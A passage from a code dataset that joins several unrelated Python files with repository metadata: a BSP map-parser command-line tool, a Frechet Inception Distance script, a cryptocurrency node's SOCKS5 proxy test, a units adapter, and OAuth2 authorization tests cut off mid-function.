			os.makedirs(dir_name, exist_ok=True)
		for lump_name in self.bsp_parser_dict["lump_name_list"]:
			lump = self.bsp_parser_dict["lump_dict"][lump_name]()
			if lump_name in self.lump_dict:
				lump.importLump(self.lump_dict[lump_name])
				if not lump.isEmpty():
					lump.writeBspDirLump(dir_name, lump_name)
		# bsp.json records the format so readDir() can pick the right parser.
		bsp_json_dict = {
			"bsp_magic_number": self.bsp_magic_number,
			"bsp_version": self.bsp_version,
		}
		bsp_description_file_path = os.path.join(dir_name, "bsp.json")
		bsp_description_file = open(bsp_description_file_path, "w")
		bsp_description_file.write(json.dumps(bsp_json_dict, sort_keys=True, indent="\t"))
		bsp_description_file.close()
	def importLump(self, lump_name, blob):
		"""Store the raw bytes of one lump."""
		self.lump_dict[lump_name] = blob
	def exportLump(self, lump_name):
		"""Return the raw bytes of one lump, or b"" when absent."""
		if lump_name in self.lump_dict.keys():
			return self.lump_dict[lump_name]
		else:
			return b""
# must be defined after classes otherwise Python will not find references
# see http://www.mralligator.com/q3/
# Quake 3 (IBSP 46) lump directory: name -> parser class, in on-disk order.
q3_lump_dict = OrderedDict()
q3_lump_dict["entities"] = Q3Entities
q3_lump_dict["textures"] = Q3Textures
q3_lump_dict["planes"] = Blob
q3_lump_dict["nodes"] = Blob
q3_lump_dict["leafs"] = Blob
q3_lump_dict["leaffaces"] = Blob
q3_lump_dict["leafbrushes"] = Blob
q3_lump_dict["models"] = Blob
q3_lump_dict["brushes"] = Blob
q3_lump_dict["brushsides"] = Blob
q3_lump_dict["vertexes"] = Blob
q3_lump_dict["meshverts"] = Blob
q3_lump_dict["effects"] = Blob
q3_lump_dict["faces"] = Blob
q3_lump_dict["lightmaps"] = Q3Lightmaps
q3_lump_dict["lightvols"] = Blob
q3_lump_dict["visdata"] = Blob
q3_lump_name_list = list(q3_lump_dict.keys())
# IBSP 47 (Quake Live): Quake 3 layout plus an advertisements lump.
ql_lump_dict = q3_lump_dict.copy()
ql_lump_dict["advertisements"] = Blob
ql_lump_name_list = list(ql_lump_dict.keys())
# RBSP (Jedi Academy, JK2, SoF): Quake 3 layout plus a lightarray lump.
ja_lump_dict = q3_lump_dict.copy()
ja_lump_dict["lightarray"] = Blob
ja_lump_name_list = list(ja_lump_dict.keys())
# FBSP (QFusion/Warsow): RBSP-like layout with larger 512x512 lightmaps.
qf_lump_dict = q3_lump_dict.copy()
qf_lump_dict["lightmaps"] = QFLightmaps
qf_lump_dict["lightarray"] = Blob
qf_lump_name_list = list(qf_lump_dict.keys())
fbsp_dict = {
	# Warsow uses version 1
	# it's an RBSP derivative with larger lightmaps
	1: {
		"lump_dict": qf_lump_dict,
		"lump_name_list": qf_lump_name_list,
	}
}
ibsp_dict = {
	# Quake 2, not supported yet
	# 19: {},
	# Quake 3 Arena, Tremulous, World of Padman, Xonotic, Unvanquished, etc.
	46: {
		"lump_dict": q3_lump_dict,
		"lump_name_list": q3_lump_name_list,
	},
	# RCTW, Wolf:ET, Quake Live, etc.
	47: {
		"lump_dict": ql_lump_dict,
		"lump_name_list": ql_lump_name_list,
	},
}
rbsp_dict = {
	# Both JA, JK2, Soldier of Fortune use version 1
	1: {
		"lump_dict": ja_lump_dict,
		"lump_name_list": ja_lump_name_list,
	}
}
# Top-level dispatch: magic number -> {version -> parser description}.
bsp_dict = {
	# QFusion
	"FBSP": fbsp_dict,
	# id Tech 3
	"IBSP": ibsp_dict,
	# Raven
	"RBSP": rbsp_dict,
	# Valve/Source, not supported yet
	# see https://developer.valvesoftware.com/wiki/Source_BSP_File_Format
	# "VBSP": {},
}
def main(stage=None):
    """Command-line entry point of the BSP tool.

    Parses arguments, loads a BSP (from a .bsp file or an unpacked .bspdir
    directory), optionally imports/exports/strips individual lumps, and
    finally prints the listings requested on the command line.

    Args:
        stage: optional sub-command name, appended to the program name shown
            in --help output (used when the tool is invoked as a stage of a
            larger driver).
    """
    # TODO: check files
    if stage:
        prog_name = os.path.basename(m.__file__) + " " + stage
    else:
        prog_name = os.path.basename(m.__file__)

    description = "%(prog)s is a BSP parser for my lovely granger."
    # Local name renamed from "args" to "parser" so the parser and the parsed
    # namespace no longer share a name.
    parser = argparse.ArgumentParser(description=description, prog=prog_name)

    parser.add_argument("-D", "--debug", help="print debug information", action="store_true")
    parser.add_argument("-ib", "--input-bsp", dest="input_bsp_file", metavar="FILENAME", help="read from .bsp file %(metavar)s")
    parser.add_argument("-id", "--input-bspdir", dest="input_bsp_dir", metavar="DIRNAME", help="read from .bspdir directory %(metavar)s")
    parser.add_argument("-ob", "--output-bsp", dest="output_bsp_file", metavar="FILENAME", help="write to .bsp file %(metavar)s")
    parser.add_argument("-od", "--output-bspdir", dest="output_bsp_dir", metavar="DIRNAME", help="write to .bspdir directory %(metavar)s")
    parser.add_argument("-ie", "--input-entities", dest="input_entities_file", metavar="FILENAME", help="read from entities .txt file %(metavar)s")
    parser.add_argument("-oe", "--output-entities", dest="output_entities_file", metavar="FILENAME", help="write to entities .txt file %(metavar)s")
    # BUGFIX: help text said "read rom textures".
    parser.add_argument("-it", "--input-textures", dest="input_textures_file", metavar="FILENAME", help="read from textures .csv file %(metavar)s")
    parser.add_argument("-ot", "--output-textures", dest="output_textures_file", metavar="FILENAME", help="write to textures .csv file %(metavar)s")
    parser.add_argument("-il", "--input-lightmaps", dest="input_lightmaps_dir", metavar="DIRNAME", help="read from lightmaps directory %(metavar)s")
    parser.add_argument("-ol", "--output-lightmaps", dest="output_lightmaps_dir", metavar="DIRNAME", help="write to lightmaps directory %(metavar)s")
    parser.add_argument("-sl", "--strip-lightmaps", help="empty the lightmap lump", action="store_true")
    parser.add_argument("-sk", "--substitute-keywords", dest="substitute_keywords", metavar="FILENAME", help="use entity keyword substitution rules from .csv file %(metavar)s")
    # BUGFIX: the option strings were fused into one malformed string
    # ("-Lf', '--lowercase-filepaths"), which made the flag unusable.
    parser.add_argument("-Lf", "--lowercase-filepaths", dest="lowercase_filepaths", help="lowercase file paths", action="store_true")
    parser.add_argument("-la", "--list-all", help="list all", action="store_true")
    parser.add_argument("-lL", "--list-lumps", help="list lumps", action="store_true")
    parser.add_argument("-le", "--list-entities", help="list entities", action="store_true")
    parser.add_argument("-ls", "--list-sounds", help="list sounds", action="store_true")
    parser.add_argument("-lt", "--list-textures", help="list textures", action="store_true")
    parser.add_argument("-ll", "--list-lightmaps", help="list lightmaps", action="store_true")
    parser.add_argument("-pe", "--print-entities", help="print entities", action="store_true")

    args = parser.parse_args()

    if args.debug:
        logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
        debug("Debug logging activated")
        debug("args: " + str(args))

    bsp = Bsp()
    entities = Q3Entities()
    textures = Q3Textures()
    lightmaps = Q3Lightmaps()

    # --- input phase: load the BSP, then overlay any explicit lump inputs ---
    if args.input_bsp_file:
        bsp.readFile(args.input_bsp_file)

    # TODO: must conflict with input_bsp_file
    if args.input_bsp_dir:
        bsp.readDir(args.input_bsp_dir)

    if args.input_entities_file:
        entities.readFile(args.input_entities_file)
        bsp.importLump("entities", entities.exportLump())

    if args.input_textures_file:
        textures.readFile(args.input_textures_file)
        bsp.importLump("textures", textures.exportLump())

    if args.input_lightmaps_dir:
        lightmaps.readDir(args.input_lightmaps_dir)
        bsp.importLump("lightmaps", lightmaps.exportLump())

    # --- transform phase ---
    if args.strip_lightmaps:
        # reset the lightmap lump
        lightmaps = Q3Lightmaps()
        bsp.importLump("lightmaps", lightmaps.exportLump())

    if args.substitute_keywords:
        substitution = Map.KeyValueSubstitution()
        substitution.readFile(args.substitute_keywords)
        bsp.substituteKeywords(substitution)

    if args.lowercase_filepaths:
        bsp.lowerCaseFilePaths()

    # Re-export the (possibly modified) lumps so the output/list phases see
    # the current state of the BSP.
    entities.importLump(bsp.exportLump("entities"))
    textures.importLump(bsp.exportLump("textures"))
    lightmaps.importLump(bsp.exportLump("lightmaps"))

    # --- output phase ---
    if args.output_bsp_file:
        bsp.writeFile(args.output_bsp_file)

    if args.output_bsp_dir:
        bsp.writeDir(args.output_bsp_dir)

    if args.output_entities_file:
        if not entities.isEmpty():
            entities.writeFile(args.output_entities_file)
        else:
            Ui.error("Entities lump missing")

    if args.output_textures_file:
        if not textures.isEmpty():
            textures.writeFile(args.output_textures_file)
        else:
            Ui.error("Textures lump missing")

    if args.output_lightmaps_dir:
        lightmaps.writeDir(args.output_lightmaps_dir)

    # --- listing phase ---
    if args.list_all:
        args.list_lumps = True
        if not entities.isEmpty():
            args.list_entities = True
            args.list_sounds = True
        if not textures.isEmpty():
            args.list_textures = True
        if not lightmaps.isEmpty():
            args.list_lightmaps = True

    if args.list_lumps:
        bsp.printLumpList()

    if args.list_entities:
        if not entities.isEmpty():
            entities.printList()
        else:
            Ui.error("Entities lump missing")

    if args.list_textures:
        if not textures.isEmpty():
            textures.printList()
        else:
            Ui.error("Textures lump missing")

    if args.list_lightmaps:
        if not lightmaps.isEmpty():
            lightmaps.printList()
        else:
            Ui.error("Lightmaps lump missing")

    if args.list_sounds:
        if not entities.isEmpty():
            entities.printSoundList()
        else:
            Ui.error("Entities lump missing")

    if args.print_entities:
        if not entities.isEmpty():
            entities.printString()
        else:
            Ui.error("Entities lump missing")


if __name__ == "__main__":
    main()
| 30.280172 | 171 | 0.707616 |
4fa55b586a53d43d9286ac94aa4bcd43d38c4008 | 9,757 | py | Python | cGAN/fid/fid_score.py | youngleox/gmu | 0ab963976098ce7861c462ddae136ac92edd9916 | [
"MIT"
] | null | null | null | cGAN/fid/fid_score.py | youngleox/gmu | 0ab963976098ce7861c462ddae136ac92edd9916 | [
"MIT"
] | null | null | null | cGAN/fid/fid_score.py | youngleox/gmu | 0ab963976098ce7861c462ddae136ac92edd9916 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Calculates the Frechet Inception Distance (FID) to evalulate GANs
The FID metric calculates the distance between two distributions of images.
Typically, we have summary statistics (mean & covariance matrix) of one
of these distributions, while the 2nd distribution is given by a GAN.
When run as a stand-alone program, it compares the distribution of
images that are stored as PNG/JPEG at a specified location with a
distribution given by summary statistics (in pickle format).
The FID is calculated by assuming that X_1 and X_2 are the activations of
the pool_3 layer of the inception net for generated samples and real world
samples respectively.
See --help to see further details.
Code adapted from https://github.com/bioinf-jku/TTUR to use PyTorch instead
of Tensorflow
Copyright 2018 Institute of Bioinformatics, JKU Linz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import pathlib
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
import numpy as np
import torch
from scipy import linalg
from torch.nn.functional import adaptive_avg_pool2d
from PIL import Image
try:
from tqdm import tqdm
except ImportError:
# If not tqdm is not available, provide a mock version of it
def tqdm(x): return x
from fid.inception import InceptionV3
# Command-line interface: two positional paths (image directories or
# precomputed .npz statistics files) plus batch/feature-dimension/GPU options.
parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('path', type=str, nargs=2,
                    help=('Path to the generated images or '
                          'to .npz statistic files'))
parser.add_argument('--batch-size', type=int, default=50,
                    help='Batch size to use')
parser.add_argument('--dims', type=int, default=2048,
                    choices=list(InceptionV3.BLOCK_INDEX_BY_DIM),
                    help=('Dimensionality of Inception features to use. '
                          'By default, uses pool3 features'))
parser.add_argument('-c', '--gpu', default='', type=str,
                    help='GPU to use (leave blank for CPU only)')
def imread(filename):
    """
    Loads an image file into a (height, width, 3) uint8 ndarray.
    """
    # Decode via PIL, then drop any alpha channel so exactly 3 channels remain.
    pixels = np.asarray(Image.open(filename), dtype=np.uint8)
    return pixels[..., :3]
def get_activations(files, model, batch_size=50, dims=2048,
                    cuda=False, verbose=False):
    """Calculates the activations of the pool_3 layer for all images.

    Params:
    -- files       : List of image files paths
    -- model       : Instance of inception model
    -- batch_size  : Batch size of images for the model to process at once.
                     Make sure that the number of samples is a multiple of
                     the batch size, otherwise some samples are ignored. This
                     behavior is retained to match the original FID score
                     implementation.
    -- dims        : Dimensionality of features returned by Inception
    -- cuda        : If set to True, use GPU
    -- verbose     : If set to True and parameter out_step is given, the number
                     of calculated batches is reported.
    Returns:
    -- A numpy array of dimension (num images, dims) that contains the
       activations of the given tensor when feeding inception with the
       query tensor.
    """
    model.eval()

    # Robustness: with no input files the loop below would divide by a zero
    # batch size; return an empty activation matrix instead.
    if not files:
        return np.empty((0, dims))

    if batch_size > len(files):
        print(('Warning: batch size is bigger than the data size. '
               'Setting batch size to data size'))
        batch_size = len(files)

    # BUGFIX: n_batches was referenced in the verbose message but never
    # defined, so verbose=True raised a NameError. Also report the batch
    # counter (not the raw file index) in the progress message.
    n_batches = (len(files) + batch_size - 1) // batch_size

    pred_arr = np.empty((len(files), dims))

    for i in tqdm(range(0, len(files), batch_size)):
        if verbose:
            print('\rPropagating batch %d/%d' % (i // batch_size + 1, n_batches),
                  end='', flush=True)
        start = i
        end = i + batch_size

        images = np.array([imread(str(f)).astype(np.float32)
                           for f in files[start:end]])

        # Reshape to (n_images, 3, height, width)
        images = images.transpose((0, 3, 1, 2))
        images /= 255

        batch = torch.from_numpy(images).type(torch.FloatTensor)
        if cuda:
            batch = batch.cuda()

        pred = model(batch)[0]

        # If model output is not scalar, apply global spatial average pooling.
        # This happens if you choose a dimensionality not equal 2048.
        if pred.size(2) != 1 or pred.size(3) != 1:
            pred = adaptive_avg_pool2d(pred, output_size=(1, 1))

        pred_arr[start:end] = pred.cpu().data.numpy().reshape(pred.size(0), -1)

    if verbose:
        print(' done')

    return pred_arr
def calculate_frechet_distance(mu1, sigma1, mu2, sigma2, eps=1e-6):
    """Numpy implementation of the Frechet Distance.

    The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
    and X_2 ~ N(mu_2, C_2) is

            d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).

    Stable version by Dougal J. Sutherland.

    Params:
    -- mu1    : mean of activations for generated samples.
    -- mu2    : mean of activations for the reference data set.
    -- sigma1 : covariance of activations for generated samples.
    -- sigma2 : covariance of activations for the reference data set.
    -- eps    : diagonal jitter added when the covariance product is
                numerically singular.

    Returns:
    -- The Frechet Distance.
    """
    mu1, mu2 = np.atleast_1d(mu1), np.atleast_1d(mu2)
    sigma1, sigma2 = np.atleast_2d(sigma1), np.atleast_2d(sigma2)

    assert mu1.shape == mu2.shape, \
        'Training and test mean vectors have different lengths'
    assert sigma1.shape == sigma2.shape, \
        'Training and test covariances have different dimensions'

    mean_diff = mu1 - mu2

    # Product might be almost singular
    cov_sqrt, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False)
    if not np.isfinite(cov_sqrt).all():
        msg = ('fid calculation produces singular product; '
               'adding %s to diagonal of cov estimates') % eps
        print(msg)
        jitter = np.eye(sigma1.shape[0]) * eps
        cov_sqrt = linalg.sqrtm((sigma1 + jitter).dot(sigma2 + jitter))

    # Numerical error might give slight imaginary component
    if np.iscomplexobj(cov_sqrt):
        if not np.allclose(np.diagonal(cov_sqrt).imag, 0, atol=1e-3):
            m = np.max(np.abs(cov_sqrt.imag))
            raise ValueError('Imaginary component {}'.format(m))
        cov_sqrt = cov_sqrt.real

    return (mean_diff.dot(mean_diff) + np.trace(sigma1) + np.trace(sigma2)
            - 2 * np.trace(cov_sqrt))
def calculate_activation_statistics(files, model, batch_size=50,
                                    dims=2048, cuda=False, verbose=False):
    """Calculation of the statistics used by the FID.

    Params:
    -- files       : List of image files paths
    -- model       : Instance of inception model
    -- batch_size  : The images numpy array is split into batches with
                     batch size batch_size. A reasonable batch size
                     depends on the hardware.
    -- dims        : Dimensionality of features returned by Inception
    -- cuda        : If set to True, use GPU
    -- verbose     : If set to True and parameter out_step is given, the
                     number of calculated batches is reported.
    Returns:
    -- mu    : The mean over samples of the activations of the pool_3 layer of
               the inception model.
    -- sigma : The covariance matrix of the activations of the pool_3 layer of
               the inception model.
    """
    # Extract per-image features, then summarize them as mean + covariance.
    features = get_activations(files, model, batch_size, dims, cuda, verbose)
    return np.mean(features, axis=0), np.cov(features, rowvar=False)
def _compute_statistics_of_path(path, model, batch_size, dims, cuda):
    """Load FID statistics either from a precomputed .npz file or by
    running the inception model over every .jpg/.png under a directory."""
    if not path.endswith('.npz'):
        image_dir = pathlib.Path(path)
        image_files = list(image_dir.glob('*.jpg')) + list(image_dir.glob('*.png'))
        return calculate_activation_statistics(image_files, model, batch_size,
                                               dims, cuda)

    stats = np.load(path)
    m, s = stats['mu'][:], stats['sigma'][:]
    stats.close()
    return m, s
def calculate_fid_given_paths(paths, batch_size, cuda, dims):
    """Calculates the FID of two paths"""
    # Fail early on the first path that does not exist.
    for candidate in paths:
        if not os.path.exists(candidate):
            raise RuntimeError('Invalid path: %s' % candidate)

    block_idx = InceptionV3.BLOCK_INDEX_BY_DIM[dims]
    model = InceptionV3([block_idx])
    if cuda:
        model.cuda()

    stats = [_compute_statistics_of_path(p, model, batch_size, dims, cuda)
             for p in paths[:2]]
    (m1, s1), (m2, s2) = stats

    return calculate_frechet_distance(m1, s1, m2, s2)
if __name__ == '__main__':
    args = parser.parse_args()
    # Restrict visible GPUs before any CUDA initialization happens;
    # an empty string means CPU-only.
    os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu

    fid_value = calculate_fid_given_paths(args.path,
                                          args.batch_size,
                                          args.gpu != '',
                                          args.dims)
    print('FID: ', fid_value)
| 36.958333 | 79 | 0.631547 |
f6a55cfd624929913c5f642c96f4adf56a07c38e | 6,106 | py | Python | qa/rpc-tests/proxy_test.py | wealthsilo/WealthSilo | 318df3155e8ede3e2c34fd4b02bf4a7ee8d53e65 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | wealthsilo/WealthSilo | 318df3155e8ede3e2c34fd4b02bf4a7ee8d53e65 | [
"MIT"
] | null | null | null | qa/rpc-tests/proxy_test.py | wealthsilo/WealthSilo | 318df3155e8ede3e2c34fd4b02bf4a7ee8d53e65 | [
"MIT"
] | 1 | 2018-08-10T23:57:27.000Z | 2018-08-10T23:57:27.000Z | #!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import socket
import traceback, sys
from binascii import hexlify
import time, os
from socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework import BitcoinTestFramework
from util import *
'''
Test plan:
- Start bitcoind's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on bitcoind side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create bitcoinds that connect to them
- Manipulate the bitcoinds using addnode (onetry) and observe the effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
'''
class ProxyTest(BitcoinTestFramework):
    """Exercise bitcoind's SOCKS5 proxy support against mock proxy servers."""

    def __init__(self):
        # Create two proxies on different ports
        # ... one unauthenticated
        self.conf1 = Socks5Configuration()
        self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000))
        self.conf1.unauth = True
        self.conf1.auth = False
        # ... one supporting authenticated and unauthenticated (Tor)
        self.conf2 = Socks5Configuration()
        self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000))
        self.conf2.unauth = True
        self.conf2.auth = True
        # ... one on IPv6 with similar configuration
        self.conf3 = Socks5Configuration()
        self.conf3.af = socket.AF_INET6
        self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000))
        self.conf3.unauth = True
        self.conf3.auth = True

        # Start the three mock SOCKS5 servers; each records the connection
        # commands it receives on a queue that the tests drain below.
        self.serv1 = Socks5Server(self.conf1)
        self.serv1.start()
        self.serv2 = Socks5Server(self.conf2)
        self.serv2.start()
        self.serv3 = Socks5Server(self.conf3)
        self.serv3.start()

    def setup_nodes(self):
        """Start four nodes with the proxy configurations under test."""
        # Note: proxies are not used to connect to local nodes
        # this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
        return start_nodes(4, self.options.tmpdir, extra_args=[
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
            ['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0']
            ])

    def node_test(self, node, proxies, auth):
        """Drive one node through IPv4/IPv6/onion/DNS addnode attempts.

        ``proxies`` lists, in order, the mock proxy expected to receive each
        of the four connection attempts; ``auth`` tells whether the proxy
        requires credentials.  Returns the list of observed Socks5Commands.
        """
        rv = []
        # Test: outgoing IPv4 connection through node
        node.addnode("15.61.23.23:1234", "onetry")
        cmd = proxies[0].queue.get()
        assert(isinstance(cmd, Socks5Command))
        # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "15.61.23.23")
        assert_equal(cmd.port, 1234)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)

        # Test: outgoing IPv6 connection through node
        node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
        cmd = proxies[1].queue.get()
        assert(isinstance(cmd, Socks5Command))
        # Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534")
        assert_equal(cmd.port, 5443)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)

        # Test: outgoing onion connection through node
        node.addnode("wealthsilovj7kcklujarx.onion:6520", "onetry")
        cmd = proxies[2].queue.get()
        assert(isinstance(cmd, Socks5Command))
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "wealthsilovj7kcklujarx.onion")
        assert_equal(cmd.port, 6520)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)

        # Test: outgoing DNS name connection through node
        node.addnode("node.noumenon:8333", "onetry")
        cmd = proxies[3].queue.get()
        assert(isinstance(cmd, Socks5Command))
        assert_equal(cmd.atyp, AddressType.DOMAINNAME)
        assert_equal(cmd.addr, "node.noumenon")
        assert_equal(cmd.port, 8333)
        if not auth:
            assert_equal(cmd.username, None)
            assert_equal(cmd.password, None)
        rv.append(cmd)

        return rv

    def run_test(self):
        """Run node_test against each node/proxy configuration."""
        # basic -proxy
        self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)

        # -proxy plus -onion
        self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)

        # -proxy plus -onion, -proxyrandomize
        rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
        # Check that credentials as used for -proxyrandomize connections are unique
        credentials = set((x.username,x.password) for x in rv)
        assert_equal(len(credentials), 4)

        # proxy on IPv6 localhost
        self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False)
if __name__ == '__main__':
    # Entry point when run directly by the test runner.
    ProxyTest().main()
| 41.821918 | 145 | 0.653456 |
1197c6e086f1809a25a9f2b8aaf11d9ec00a9158 | 1,154 | py | Python | codetools/contexts/adapter/unit_corrector_adapter.py | braidedlogix/Codetools_wxPhoenix_py3 | 555e7e3e4895ef9d79716e0323db4445436d10dc | [
"BSD-3-Clause"
] | 1 | 2017-05-12T04:17:50.000Z | 2017-05-12T04:17:50.000Z | codetools/contexts/adapter/unit_corrector_adapter.py | braidedlogix/Codetools_wxPhoenix_py3 | 555e7e3e4895ef9d79716e0323db4445436d10dc | [
"BSD-3-Clause"
] | null | null | null | codetools/contexts/adapter/unit_corrector_adapter.py | braidedlogix/Codetools_wxPhoenix_py3 | 555e7e3e4895ef9d79716e0323db4445436d10dc | [
"BSD-3-Clause"
] | null | null | null | #
# (C) Copyright 2013 Enthought, Inc., Austin, TX
# All right reserved.
#
# This file is open source software distributed according to the terms in
# LICENSE.txt
#
# ETS library imports
from scimath.units.api import UnitArray
from traits.api import Dict
# Local imports
from .unit_manipulation_adapter import UnitManipulationAdapter
from .unit_converter_functions import unit_array_units_overwriter
# Converter table used by UnitCorrectorAdapter: for UnitArray objects,
# overwrite the existing units with the new ones (see
# unit_array_units_overwriter in unit_converter_functions).
unit_corrector_converters = {UnitArray: unit_array_units_overwriter}


class UnitCorrectorAdapter(UnitManipulationAdapter):
    """ Overwrite units on an object with a new set of units. The new units
        are found based on the name for the object in the context.

        Note: This is an extremely thin wrapper around UnitManipulationAdapter.
        It only overrides the default settings for converters.

        fixme: We may want to modify converters so that they don't overwrite
               compatible units with new units. We may only want to correct
               units that are completely screwed up...
    """

    # override with a set of converters that add units to objects
    converters = Dict(unit_corrector_converters)
| 34.969697 | 79 | 0.747834 |
e8bd92fd3641fad6d9666323bf38d8ccc7a3b89a | 8,088 | py | Python | tests/test_decorators.py | jrcastro2/invenio-oauth2server | f74bbe1ea19656831ac94946999100b65e6fe7dd | [
"MIT"
] | 3 | 2015-08-19T12:51:12.000Z | 2017-10-25T00:58:52.000Z | tests/test_decorators.py | jrcastro2/invenio-oauth2server | f74bbe1ea19656831ac94946999100b65e6fe7dd | [
"MIT"
] | 157 | 2015-08-04T12:14:23.000Z | 2021-06-02T14:59:10.000Z | tests/test_decorators.py | jrcastro2/invenio-oauth2server | f74bbe1ea19656831ac94946999100b65e6fe7dd | [
"MIT"
] | 44 | 2015-08-03T17:05:27.000Z | 2022-01-19T19:06:53.000Z | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""OAuth2Server decorators test cases."""
from datetime import datetime
from flask import url_for
from invenio_accounts.proxies import current_accounts
def test_require_api_auth_oauthlib_urldecode_issue(resource_fixture):
    """An anonymous request whose query string contains ':' is rejected."""
    app = resource_fixture
    with app.test_client() as client:
        response = client.get(app.url_for_test1resource, query_string='q=k:v')
        assert response.status_code == 401
def test_require_api_auth_test1(resource_fixture):
    """Anonymous GET is rejected, token-authenticated GET is accepted."""
    app = resource_fixture
    cases = [
        (app.url_for_test1resource, 401),
        (app.url_for_test1resource_token, 200),
    ]
    with app.test_client() as client:
        for url, expected_status in cases:
            response = client.get(url)
            assert response.status_code == expected_status
            # API responses must never establish a session cookie.
            assert 'Set-Cookie' not in response.headers
def test_require_api_auth_test2(resource_fixture):
    """Same auth check as test1, against the second test resource."""
    app = resource_fixture
    cases = [
        (app.url_for_test2resource, 401),
        (app.url_for_test2resource_token, 200),
    ]
    with app.test_client() as client:
        for url, expected_status in cases:
            response = client.get(url)
            assert response.status_code == expected_status
            # API responses must never establish a session cookie.
            assert 'Set-Cookie' not in response.headers
def test_require_oauth_scopes_test1(resource_fixture):
    """Token with the required scope passes; token without it gets 403."""
    app = resource_fixture
    cases = [
        (app.url_for_test1resource_token, 200),
        (app.url_for_test1resource_token_noscope, 403),
    ]
    with app.test_client() as client:
        for url, expected_status in cases:
            response = client.post(url)
            assert response.status_code == expected_status
            assert 'Set-Cookie' not in response.headers
def test_require_oauth_scopes_test2(resource_fixture):
    """Scope enforcement check for the second test resource."""
    app = resource_fixture
    cases = [
        (app.url_for_test2resource_token, 200),
        (app.url_for_test2resource_token_noscope, 403),
    ]
    with app.test_client() as client:
        for url, expected_status in cases:
            response = client.post(url)
            assert response.status_code == expected_status
            assert 'Set-Cookie' not in response.headers
def test_require_oauth_scopes_allow_anonymous(resource_fixture):
    """Anonymous access is allowed; the body reflects the current user id."""
    app = resource_fixture
    with app.test_client() as client:
        # Anonymous request: allowed, user id rendered as "None".
        response = client.get(app.url_for_test4resource)
        assert response.status_code == 200
        assert response.data == b'None'
        assert 'Set-Cookie' not in response.headers

        # Token request: allowed, body carries the authenticated user id.
        response = client.get(app.url_for_test4resource_token)
        assert response.status_code == 200
        assert response.data == u'{0}'.format(app.user_id).encode('utf-8')
        assert 'Set-Cookie' not in response.headers
def test_rest_extension(resource_fixture):
    """Same anonymous/token behavior as above, exercised via POST."""
    app = resource_fixture
    with app.test_client() as client:
        # Anonymous POST: allowed, user id rendered as "None".
        response = client.post(app.url_for_test4resource)
        assert response.status_code == 200
        assert response.data == b'None'
        assert 'Set-Cookie' not in response.headers

        # Token POST: allowed, body carries the authenticated user id.
        response = client.post(app.url_for_test4resource_token)
        assert response.status_code == 200
        assert response.data == u'{0}'.format(app.user_id).encode('utf-8')
        assert 'Set-Cookie' not in response.headers
def test_access_login_required(resource_fixture):
    """Session login/logout must not grant or leak access to API resources.

    The exact request ordering matters: it interleaves token-protected and
    login-protected endpoints before, during, and after a session login to
    verify that session cookies and OAuth tokens stay independent.
    """
    app = resource_fixture
    with app.test_client() as client:
        # try to access to authentication required zone
        res = client.post(app.url_for_test3resource)
        assert 401 == res.status_code
